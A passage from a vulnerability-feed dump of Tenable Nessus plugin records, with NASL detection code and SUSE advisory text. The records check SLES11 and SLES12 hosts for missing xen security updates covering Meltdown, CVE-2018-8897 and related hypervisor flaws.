\"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-debugsource-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-doc-html-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.7.5_02-43.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:45:11", "description": "This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-14T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:1216-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1216-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109756", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1216-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109756);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:1216-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181216-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?561d072a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-841=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-841=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-841=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2018-841=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-debugsource-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-doc-html-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.7.5_02-43.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:52:21", "description": "This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-11T00:00:00", "title": "SUSE SLES11 Security Update : xen (SUSE-SU-2018:1203-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "modified": "2018-05-11T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:xen-doc-html", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:xen-doc-pdf", "p-cpe:/a:novell:suse_linux:xen-kmp-pae", "p-cpe:/a:novell:suse_linux:xen-kmp-default", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1203-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109722", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1203-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109722);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-7550\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLES11 Security Update : xen (SUSE-SU-2018:1203-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1083292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-7550/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181203-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?837e1ce1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-xen-13595=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-xen-13595=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-xen-13595=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"i386|i486|i586|i686|x86_64\") audit(AUDIT_ARCH_NOT, \"i386 / i486 / i586 / i686 / x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-kmp-default-4.2.5_21_3.0.101_0.47.106.19-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-doc-html-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-doc-pdf-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-tools-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"xen-kmp-pae-4.2.5_21_3.0.101_0.47.106.19-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"xen-kmp-default-4.2.5_21_3.0.101_0.47.106.19-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"xen-libs-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"xen-tools-domU-4.2.5_21-45.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"i586\", reference:\"xen-kmp-pae-4.2.5_21_3.0.101_0.47.106.19-45.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T14:52:18", "description": "This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\n - CVE-2018-7550: The load_multiboot function allowed local\n guest OS users to execute arbitrary code on the host via\n a mh_load_end_addr value greater than mh_bss_end_addr,\n which triggers an out-of-bounds read or write memory\n access (bsc#1083292).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}, "published": "2018-05-10T00:00:00", "title": "SUSE SLES11 Security Update : xen (SUSE-SU-2018:1181-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897", "CVE-2018-7550"], "modified": "2018-05-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:xen-doc-html", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:xen-kmp-pae", 